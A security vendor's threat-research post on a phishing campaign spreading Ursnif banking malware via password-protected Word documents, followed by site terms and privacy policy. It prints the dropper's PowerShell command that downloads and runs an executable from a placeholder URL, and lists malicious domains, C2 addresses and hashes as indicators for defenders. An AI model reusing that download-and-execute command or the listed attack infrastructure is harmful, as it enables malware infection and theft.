BOOK A DEMO

Wave of Ursnif Variants Leveraging Password-Protected Documents Continues to Spread Worldwide

Ursnif Variants Leveraging Password-Protected Documents

We are experiencing a surge of attacks, across the globe, by the banking and spyware family Ursnif. As recently described in the blog My Online Security, the attackers send phishing emails pretending to originate from the Australian online payment company Eway. This campaign dates back to mid-February, at the latest, having compromised victims in North America, Western Europe, Australia and Japan.

The emails contain a password protected Word document (docx). The password is found in the content of the email, which encourages the victim to open the document using the password. Since the original document attached is password protected, it evades detection by AV, anti-malware or sandboxing solutions. The sender, subject and content of the emails are all highly similar: the email is sent from an address in the newly registered domain ewaystore.info, the subject updates on the receipt of an approved order or purchase. Here is an example of one of the emails’ content:

Figure 1 – the content of the email

Once opened, the Word document displays pictures of PDF and EXCEL icons (supposedly containing a receipt) and upon clicking, invokes a PowerShell command that downloads and runs a malicious executable:

%ComSpec% /C PowerShell (New-Object System.Net.WebClient). DownloadFile (‘http://%URL_CONTAINING_PAYLOD%’,’%FILE_NAME%’);Start-Process ‘%FILE_NAME%’

In most of the cases that we have observed, the executable downloaded by PowerShell has the file name “flash.exe” or “player.exe” and carries a flash player icon. Once run, this executable enumerates a long list of registry keys and collects information about the target. The information gathered is meant to assist in evasion, set the ground for persistency and stealth, as well as provide the initial reconnaissance about the target. The malware collects the OS version, product ID, installation date, registers as a top-level exception handler (classic anti-debugging technique), modifies proxy settings, checks for existing Outlook and Windows Live Mail accounts, installed programs, and collects browser history and cache. The information gathered is written as randomly named files in the following location: %users\%user%\AppData\Local\Temp\%file_name%.
The files are deleted after being posted by HTTP post requests on one of the many possible C2 servers.

Figure 2 – a data file created and deleted after posting to the C2 server

Figure 2 – a data file created and deleted after posting to the C2 server

Communication with the C2 servers is done is SSL:

Figure 3 – DNS requests for a C2 server followed by an SSL handshake

Figure 3 – DNS requests for a C2 server followed by an SSL handshake

At this point, a second stage payload is dropped. Some variants will drop the additional executable or DLL after decrypting a section in the original PE and others will download it from a C2 server. In any case, once the second stage payload is loaded, code will be injected to explorer.exe and execution will continue from there:

Figure 4 – DLL dropped and loaded (sha256 716efba2287317a2c7a68947f966e7e6cbae1326cfa217873520330b0f7beb15)

An examination of the associated URLs and IP addresses revealed several interesting details. The infrastructure uses separate sets of IP addresses and URLs for dropping the payload (directed to by the PowerShell script) and for communication while the malware runs. The PowerShell directs to several .au domain names. However, they are all resolved to three IP addresses located in the US. The C2s used for communication in runtime seem to vary considerably between different variants. Different variants use different IP addresses and domain names, and the change seems to be consistent with the time different variants that surfaced at. Almost all IP addresses originate from Eastern Europe, predominantly the Ukraine, as well as Romania and Germany. The continuing change in C2’s IP and location is most likely an effort on the attackers’ side to make the infrastructure more difficult to trace. Deep Instinct’s research team has been successful in expanding the number of known IOC’s associated with this campaign.

It seems that Ursnif has come back on the scene, as we are witnessing several active phishing campaigns that are spreading Ursnif variants. A separate campaign spotted recently also uses password protected documents as the initial dropper. In this related campaign, the documents embedded in the initial password-protected dropper, invoke a malicious VBScript which will drop, decrypt and run the payload.

Other than the .docx files, which evade detection, most payloads are not detected by the majority of security solutions for several days after they have appeared in the wild, leaving the door open to attackers to compromise many victims. Deep Instinct’s solution accurately detects all associated payloads by leveraging its strong, deep learning based capabilities to identify new, unseen malware.

 

IoC:

Droppers (doc files) SHA-256

a772dfd01974a5fb25c04e2e9e83c81d46b9cbbc8dcb61840fe18d4d5ff87537
fd15ad5bf8e2e5ade06174628b3efcb7e34d595e6341e2cdeaef6862f37c58b7
9b3f1089ab4c89595f6514824ae4b2d14fce2819d50dd0518029a77e8c350d17
efb9229b7f0b925d06c0b0c15ee71d7febe8efbd1effa9b5efdaf38648a824c1
db381444fb075d6804b8de7193865405a0875c854df33d41b801d13411327282

 

Addresses used for serving payload
URLs

resilienceconsulting.com.au westonsocialgolfclub.com
windsorpc.com.au earlychildhoodconsulting.com.au
masterconstructions.com.au kwazii.com.au
dllfiles.org/dllfiles

 

IP Addresses

192.185.162.71
192.185.162.104
192.185.162.105


Malicious Payloads (PE)

2fb0587a1f21a41b8827be8181dbdf03279fc4bf476e8096215a5d9480ac7b58
c152be1b85cae357a3b2741d9d80c491f32b99bc27ae6bf47cc17c51109c9868
0df4cfb1e651c37d43d7f5215c3cab2024aa7c481d4e0bb4213b52c0306c3ee2
b6f7f4f6cb66ce5c69b81e59a4ecafbcf18ddb3a9abe49bb392dcf305ce0bd33
3f7daa1fcc73d85ecd260da17832440f10202854f11db18c7b98505bfe3d98ee
b00db4dd8f576c579abb72d6d6da5fc797f025accbf60571207b00244e6e5a3b
d1b637fab01fa4e5a3aae1e26fd1c1dbe9c376840c552019d876e97e17caf69d
c152be1b85cae357a3b2741d9d80c491f32b99bc27ae6bf47cc17c51109c9868
65a1d9024b198adf6cda9a9ff11aa51dd63aa31abb6b43353b3b943a5e5886fa
62f99defe2d8febfe03c27fefb5a84cf34519a8f9299cba840414dfb50897071
aafef22d14b266bd16658a0e687c4f582b83fcf63edcdee729f1449849a7997d
ca4766c22c4d58cee6c428ac0c23e882e2927a7bef1a9661cb175a4d1de9a7f9
c946c1dbf24c151632cc7955d816dd85b34038261a79f271c9469a29adbb7da4
e6cef31d573eb1d167a53ca06d6542d4f5257b83931c2ebd3de13f2fda526b3e
86045aa64d63dc9269223fa05cd12e4dad1878eb85e891bf2615c319e60e4c66
4784d6570eaadc350aed2a3d00dd258b93bec36f649965f3f9fb725cf63b43ff
3e1d4455fe60b58b4cc9e7b6683cbfd1a6b889561fc0f463b97f01cbb0194191
e843eded3d68d3c2741aea33092a4b25c07a2ffd8dd9beaa317f7487cb0e0420
8c3bf7b282a6772387d839063ecdb2adb0f5df7debf2d6adf68d0c69f891f9ba
716efba2287317a2c7a68947f966e7e6cbae1326cfa217873520330b0f7beb15
dec0a801af2a6080425d710aaa073ba449c5056659690f9113af2273a576f045

C2 servers

URLs

mediacontent.ltd forfundamapplithtsuthe.ru
0001krasemia.com geroyamslava.at
groupcreatedt.at sourcethwicoccu.ru
fileservers.at foradvisedcalthephpgiven.ru
blackcoffee.bit provthisgroupgr.ru
programuserandussource.ru createdpteamrights.ru
belowscamarksaccyouwith.ru follthethatforunderthe.ru
teththethelicense.ru

 

IP Addresses

82.117.253.173 178.94.153.9 176.126.176.230
213.159.253.8 176.215.55.189 93.113.176.105
194.58.184.253 46.185.113.17 208.67.222.222
89.185.21.82 185.13.243.181 176.38.10.47
93.79.68.247 80.71.240.164 144.76.133.38
176.112.7.100 77.122.168.109 31.6.98.151
46.150.72.96 77.123.218.185 178.137.127.178
46.185.63.7 5.166.251.172 87.106.18.141
31.133.67.199 121.182.77.149 91.222.168.221
37.115.40.38 93.79.6.249 80.71.240.164
90.154.133.176 188.190.195.205 46.63.22.22
195.72.156.234 86.126.76.162 77.123.218.185
213.227.201.28 93.78.190.202 46.119.164.24
46.250.17.10 178.215.190.133 86.106.86.211
90.154.133.176 178.137.244.110 94.158.204.95

Associated Email addresses
customer@ewaystore[.]info
helpandcare@ewaystore[.]info

 

Book a Demo

See the benchmarks for yourself!

To understand how you can thoroughly protect your organization against unknown and known threats, from any digital touchpoint, book your private demo with a Deep Instinct expert consultant.

Get an overview of how Deep Instinct’s security solution works, as well as an initial assessment of your specific security needs.

Start instinctively protecting your organization against all threats.

*
*
*
*
* We respect your privacy. Read our Privacy Policy
BOOK A DEMO TODAY

Terms of Use

Last updated: 20 September, 2015

THIS WEBSITE, www.Deep Instinct.com (the “Site”), is owned and operated by Deep Instinct Ltd. (“Deep Instinct”, “we”, “us” or “our”). Any use of this Site or the services available on the site from time to time (“Services”) is subject to and conditioned upon your consent to and compliance with, all of the terms and conditions in this terms of use agreement (the “Agreement”) which also incorporates our privacy policy [insert hyperlink to privacy policy]. By accessing and using the Site and/or any Services made available on it you hereby consent to be bound by this Agreement. If you do not agree with any of the terms and conditions of use, please cease any use or access to this Site and any use or access to the Services. We may amend this Agreement at any time by posting the amended terms on the Site. Your continued use of the Site or Services shall constitute your consent to any changes made. If you do not agree to the new or different terms, you should not use the Site or the Service. This Agreement may not be otherwise amended.

THE SITE AND THE SERVICES

We are engaged in the business of development, configuration, marketing, sales, integration and implementation of projects and solutions (including tactical verticals thereof) in the field of cyber security and our Site provides informative, educational and promotional information on our company, our products, and our services. We currently do not offer a direct download of our products from our site and provide our software directly to you subject to additional terms and conditions which are detailed in the end user license agreement accompanying each copy of our products.

ELIGIBILITY TO USE OUR SERVICES

This Site is aimed for use by individuals who are natural persons, who are at least 13 years old and who are of sufficient legal age and capability to form a binding agreement under the laws of their domicile. You may not use the Site and the Services and may not accept this Agreement if (a) you are not of legal age to form a binding contract with Deep Instinct (as determined in your domicile), or (b) you are a person barred from using the Site or the Services under the laws of the United States or Israel or other countries including the country in which you are domiciled or from which you access or use the Site and/or the Services. Subject to applicable law, Deep Instinct may, in its sole discretion, refuse to offer the Site and the Services to any person or entity and change its eligibility criteria at any time.

ELECTRONIC COMMUNICATIONS

When you contact us by sending emails to us, you are communicating with us electronically and you consent to receive communications from us electronically. We will communicate with you by email (if and to the extent you choose to provide with your e-mail address) or by posting notices on this Site. You agree that all agreements, notices, disclosures and other communications that we provide to you electronically satisfy any legal requirement that such communications be in writing.

PROPRIETARY RIGHTS

The Site, the Services and the content therein are proprietary to us and/or our licensors. Any and all intellectual property rights related to the Services and the Site are and shall remain our exclusive property or our licensors. Nothing in this Site grants any license or right to use any marks displayed on this Site without the written permission of the owner of the mark. Your misuse of the marks displayed on this Site or any other content on this Site is strictly prohibited. Without derogating from any of the provisions herein, you agree not to decompile, reverse-engineer, copy, transfer, assign, rent, resell, distribute or use the Site or the Services (or any part thereof, or any software underlying the Service), other than as expressly authorized by Deep Instinct. Any and all trademarks, service marks, product names, and trade names of Deep Instinct appearing on or through the Site and/or Service are exclusively owned by Deep Instinct. All other trademarks, service marks, product names, and logos appearing on or through the Service are the property of their respective owners. You may not use or display any trademark, service mark, product name, trade name, or logo appearing on or through the Service without the owner's prior written consent. Furthermore, the site is intended for use by natural persons. Any access or use of the Site by any automated means including but not limited to spiders, bots, scrapers and the like is prohibited. Any use of any information collected by such automated means constitutes a violation of this Agreement. Any use of the Site or any parts thereof or information therein for any commercial purposes is prohibited.

COMPLIANCE WITH LAWS

Access or use of the Internet or of certain websites may be prohibited in certain territories and/or certain restrictions may apply to you in such territories. Don’t access this Site if such access is prohibited under law applicable to you. You agree that your use of the Site and Services shall not violate any applicable local, national or international law, including but not limited to any regulations having the force of law.

LINKS TO OTHER WEBSITES

This Site may contain links and references to websites of others. We may, from time to time, at our sole discretion, add or remove links to other websites. These links are provided solely for informative purposes and as a convenience to you, and access to any such websites is at your own risk. We recommend that you review the information provided by third parties (such as, but not limited to, the terms of service and privacy policy of the relevant website) before accessing such websites. We do not review, approve, monitor, endorse, warrant, or make any representations with respect to such websites. In no event will we be responsible for the information contained in such websites, their practices or for your use of or inability to use such websites, or transmissions received from such sites. You expressly relieve us from any and all liability arising from your use of any third-party website. We encourage you to be aware when you leave the Site, and to read the terms and conditions and privacy policy of such other website/s that you visit.

NO WARRANTY

THE SITE, AND ANY SERVICES OFFERED THROUGH IT IS PROVIDED ON AN "AS IS" BASIS WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, WARRANTIES OF TITLE OR IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. YOU EXPRESSLY AGREE THAT USE OF THE SITE IS AT YOUR SOLE RISK. NEITHER DEEP INSTINCT, ITS SUBSIDIARIES, ITS AFFILIATES NOR ANY OF THEIR RESPECTIVE EMPLOYEES, AGENTS, THIRD PARTY CONTENT PROVIDERS OR LICENSORS WARRANT THAT THE SITE WILL BE UNINTERRUPTED OR ERROR FREE; NOR DO THEY MAKE ANY WARRANTY AS TO THE RESULTS THAT MAY BE OBTAINED FROM USE OF THE SITE, OR AS TO THE ACCURACY, RELIABILITY OR CONTENT OF ANY INFORMATION, SERVICE, OR MERCHANDISE PROVIDED THROUGH THE SITE.

THE SITE OFFERS CERTAIN INFORMATION ABOUT THE COMPANY AND ITS PRODUCTS AND SERVICES, INCLUDING A KNOWLEDGE BASE IN WHICH THE COMPANY MAY UPLOAD CERTAIN DOCUMENTS OR PRESENTATIONS. SUCH INFORMATION IS DESIGNED FOR EDUCATIONAL AND INFORMATIONAL PURPOSES ONLY. THE INFORMATION CONTAINED ON THE SITE DOES NOT AND IS NOT INTENDED TO PROVIDE ANY REPRESENTATION OR WARRANTIES AS TO THE PRODUCTS, THEIR CAPABILITIES OR THEIR USE. ALL SUCH INFORMATION IS SPECIFICALLY PROVIDED IN THE DOCUMENTATION ACCOMPANYING THE COMPANY’S PRODUCTS AND SUCH DOCUMENTATION IS THE ONLY SOURCE OR REPRESENTATION AND WARRANTIES AS WITH RESPECT TO THE COMPANY’S PRODUCTS. YOU SHOULD NOT RELY ON THIS INFORMATION AS A SUBSTITUTE FOR, NOR DOES IT REPLACE THE COMPANY’S PRODUCTS’ DOCUMENTATION. DEEP INSTINCT IS NOT RESPONSIBLE FOR ANY ACTIONS OR INACTION ON YOUR PART BASED ON THE INFORMATION THAT IS PRESENTED IN THE SITE.

LIMITATION OF LIABILITY

IN NO EVENT SHALL WE, OUR SUBSIDIARIES, OFFICERS, DIRECTORS, EMPLOYEES OR OUR SUPPLIERS BE LIABLE FOR LOST PROFITS OR ANY SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF OR IN CONNECTION WITH OUR SITE, OUR SERVICES OR THIS AGREEMENT, HOWEVER ARISING. IF YOU ARE DISSATISFIED WITH THE SITE OR THE SERVICES OR ANY MATERIALS THEREON, OR WITH THESE TERMS AND CONDITIONS, YOUR SOLE AND EXCLUSIVE REMEDY IS TO DISCONTINUE USING THE SITE AND SERVICES. WITHOUT DEROGATING FROM ANY OF THE FOREGOING, OUR TOTAL AGGREGATE LIABILITY UNDER THIS AGREEMENT, IF ANY, IN CONNECTION WITH THE SITE, THE SERVICES OR THE AGREEMENT WILL NOT EXCEED USD $100. THE FOREGOING LIMITATIONS SHALL APPLY NOTWITHSTANDING ANY FAILURE OF ESSENTIAL PURPOSE OF ANY LIMITED REMEDY AND ARE FUNDAMENTAL ELEMENTS OF THE BARGAIN BETWEEN US AND YOU.

PRIVACY POLICY

Information that we collect and use about you is subject to our Privacy Policy located at http://www.dinstinct.com/privacy. By accessing this Site you consent to the collection and use of information as described in our Privacy Policy, as may be amended by us from time to time.

GOVERNING LAW; DISPUTE RESOLUTION

The laws of Israel will govern this Agreement, without regard to its conflict of law principles. Any and all legal claims, suits or actions that arise in connection with this Agreement and/or the Site or Services, claimed against us shall be brought exclusively in the courts located in Tel-Aviv, Israel. You agree that this Site shall be deemed a passive website that does not give rise to personal jurisdiction over Deep Instinct, either specific or general, in jurisdictions other than Israel.

LIMITATION OF CLAIMS

You agree that regardless of any statute or law to the contrary, any claim or cause of action arising out of or related to use of the Services or the Agreement must be filed within one (1) year after such claim or cause of action arose or be forever barred.

WAIVER AND SEVERABILITY

The failure of Deep Instinct to exercise or enforce any right or provision of this Agreement shall not constitute a waiver of such right or provision. If any of the provisions of this Agreement are held invalid, unenforceable, or void by a court or other tribunal of competent jurisdiction, the parties nevertheless agree that the court should endeavor to give effect to the parties' intentions as reflected in the provision, and the other provisions of the Agreement remain in full force and effect.

Deep Instinct Privacy Policy

Last updated: 20 September, 2015

This Privacy Policy ("Privacy Policy") describes the policies and practices of Deep Instinct Ltd. ("we," "us," or "Deep Instinct") and the choices you have in connection with the collection, use and disclosure of your personal information that you provide to us or that may be generated by your use of our website (the "Site"). Please review carefully this Privacy Policy before making any use of the Site. Each use of the Site by you constitutes your consent to the collection, transfer, storage, disclosure and other uses of your personal information as described in this Privacy Policy.

THE PRIVACY PHILOSOPHY OF DEEP INSTINCT

Your privacy is important to Deep Instinct. We follow generally accepted industry standards to protect the personal information submitted to us, both during transmission and once we receive it. However, due to the nature of Internet communications and evolving technologies, unauthorized entry or use, hardware or software failure, and other factors, the security of user information may be compromised at any time. No method of transmission over the Internet, or method of electronic storage, is 100% secure.

COLLECTION OF PERSONAL INFORMATION

We do not actively collect personal identifiable information. When you visit our Site you remain anonymous. Some areas of our Site may however require you to provide us with certain information, such as a user's name, email address, contact information and other personally-identifiable information ("Personal Information") may be collected from you and stored in our databases, request support, enter into a sales promotion or otherwise interact with us (for example through the "contact us" option). When you submit or make available your Personal Information through the Service, you are giving your consent to the collection, use and disclosure of such information pursuant to this Privacy Policy. If you do not wish us to collect any Personal Information from you, please do not provide us with any such information. However if you will not provide us with the required information we may not be able to provide you with the information/services requested by you.

COLLECTION OF NON-PERSONALLY IDENTIFIABLE INFORMATION

Our servers automatically collect data about your Internet Protocol address when you visit us. We collect non-identifiable information about your access to our site and your visit to it. We may also collect technical non identifiable information about the type of web browser, computer, platform, related software and settings you are using; any search terms you have entered on our Site or a referral website; and other web usage activity and data logged by our web servers. When you use the Site, we may employ clear gifs (also known as web beacons) which are used to track the online usage patterns of our users anonymously. In addition, we may also use clear gifs in HTML-based emails sent to our users to track which emails are opened by recipients. The information is used to enable more accurate reporting, improve the effectiveness of our marketing, and make Deep Instinct better for our users.

We may use "cookies" on or in connection with our Site to maintain non personally identifiable information about you. A cookie is a very small text document, which often includes an anonymous unique identifier. Deep Instinct may use both "session" cookies and "persistent" cookies. A persistent cookie remains on your hard drive after you close your browser. Persistent cookies may be used by your browser on subsequent visits to the Site. Persistent cookies can be removed by following your web browser’s directions. A session cookie is temporary and disappears after you close your browser. When you visit our Site, our computer may ask your computer for permission to employ the use of a session or persistent cookie. Our Site will then send a cookie to your browser if your browser’s preferences allow it, but (to protect your privacy) your browser only permits our Site to access the cookies it has already sent to you and not the cookies sent to you by other websites. Most web browsers can be adjusted to inform you when a cookie has been sent to you and provide you with the opportunity to refuse that cookie. However, refusing a cookie may, in some cases, preclude you from using, or negatively impact the display or function of, our Site or certain areas or features of our Site.

HOW WE USE INFORMATION

The personal information you provide to us may be used for a variety of purposes such as provide you with support, sales promotion or other interaction with us (for example through the "contact us" option). Any such use will be made only following your affirmative express consent through our Site. Your information may also be used by us, in aggregate manner for internal purposes to improve our site, content, customize advertising and content. We may also use information we collect for internal analytical purposes.

Deep Instinct uses "cookies", web beacons, log file information and other non-personally identifiable information for purposes such as to: (a) collect website users' usage data to enable easy access to the Site and otherwise improve the Site; (b) provide custom, personalized content and information; (c) monitor the effectiveness of the Site; (d) monitor aggregate metrics such as total number of visitors and pages viewed; and (e) track your entries and submissions to the Site.

HOW WE SHARE YOUR PERSONAL INFORMATION

Deep Instinct will not rent or sell your Personal Information to others.

OPT-OUT OPTIONS AND UNSUBSCRIBING

Deep Instinct may send you, from time to time, email communications, with news and updates about the Service or other products, as well as other marketing communications and promotional offers. If, you wish to stop receiving such promotional information you can opt-out by clicking the “unsubscribe” link available at the bottom part of each email sent from Deep Instinct which will remove your email address from any such mailing lists.

LINKS

The Site may contain links to third parties' web sites. While we attempt to provide links to sites that value your privacy, we cannot be responsible for the content or privacy policies of such sites. We encourage you to carefully review the privacy policies of such third parties' Web sites linked or provided through the Site prior to any use of such Web sites.

BUSINESS TRANSFERS

In the conduct of our business, we may sell some of our assets. Information collected from users of the Site, including personal information, could be transferred as part of such transaction. By submitting your personal information through the Site, you agree that your information may be transferred to third parties under such or similar circumstances.

CHANGES TO THIS PRIVACY POLICY

Deep Instinct may occasionally revise this Privacy Policy to reflect changes in its Site and other practices. Therefore, you should review Deep Instinct's Privacy Policy prior to each use of the Site, particularly each time before you submit your personal information through the Service, so you could be informed of any changes in our privacy practices. At all times, the most current version of our privacy policy will supersede any other versions of our privacy policy. You can determine when the Privacy Policy was last modified by checking the "Last updated" legend at the top of the Privacy Policy. If the policies described in our Privacy Policy change in any material respect, we will notify you by posting the revised policy on our Site, by email, or by other means that we may choose and as required by applicable law. We may apply changes to information previously collected by us, to the extent permitted by law. If you do not agree to be bound by the terms of the new or modified Privacy Policy, you agree to immediately notify us that your personal information should be deleted. Your continued use of the Site after such changes become effective constitutes your acceptance of any such changes.

HOW TO CONTACT US

If you have any questions or comments regarding this Privacy Policy, you can contact us by email at: Contact@dinstinct.com. GENERAL

This Privacy Policy replaces all previous disclosures we may have provided to you about our privacy practices associated with the Site. The examples contained in this Privacy Policy are illustrations only and are not intended to be exhaustive.